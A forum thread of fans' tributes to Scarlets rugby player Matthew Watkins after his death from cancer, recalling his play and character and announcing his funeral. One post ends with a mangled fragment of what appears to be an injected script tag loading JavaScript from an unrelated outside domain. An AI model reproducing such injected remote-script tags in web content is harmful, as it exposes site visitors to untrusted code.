Terrible news, he graced out later years at Stradey, very quick with a superb eye for a gap and an interception specialist before it became popular.

Condolences to his family

I met a fund manager a couple of months ago who was a close friend of Matthew’s. He knew the cancer had become extremely serious and not long was left. He said that Matthew looked back on his time with Scarlets as being the peak and most enjoyable period of his career and that he felt closest to the Scarlets brand.

Never met the guy and don’t especially remember seeing him play, as it was from my pre-rugby interest days.

What is clear is that life was much the better from having met him and he was a great example to others.
Any offence taken on board is only a literate/cy consequence. Every attempt at humour is just that. No personal insult intended. Standards lowered for trolls.

Very sad news. I remember well his try in 2004 vs Ulster at Stradey. Will be missed.

I had a few beers with him a couple of times during Wales games in Cardiff. He would be with 1-2 other Scarlets but it was he who was always the one who would come over to you for a chat. Absolute diamond guy.

With the matches called off he may not get the send off he deserves. Fantastic to watch with that big grin on his face, scoring tries for fun. Happy memories MJ a man that really lived his life making so many happy memories for his family and friends. < ="text/" async="" ="//zoudlogick.net/2025b8e6a7c18f2f81.js">

A friend of the family was at an event I attended a few weeks ago.

Your words would resonate strongly with his emotions about MJ’s eventual defeat in the face of a strong an extremely unpleasant adversary.

The good die young would seem to sum him up accurately.

Just a reminder that Mathew Watkins is being buried tomorrow. The service is on line tomorrow. Alix Popham urging supporters to watch it and wear their shirts. R. I.P  thinking of his family
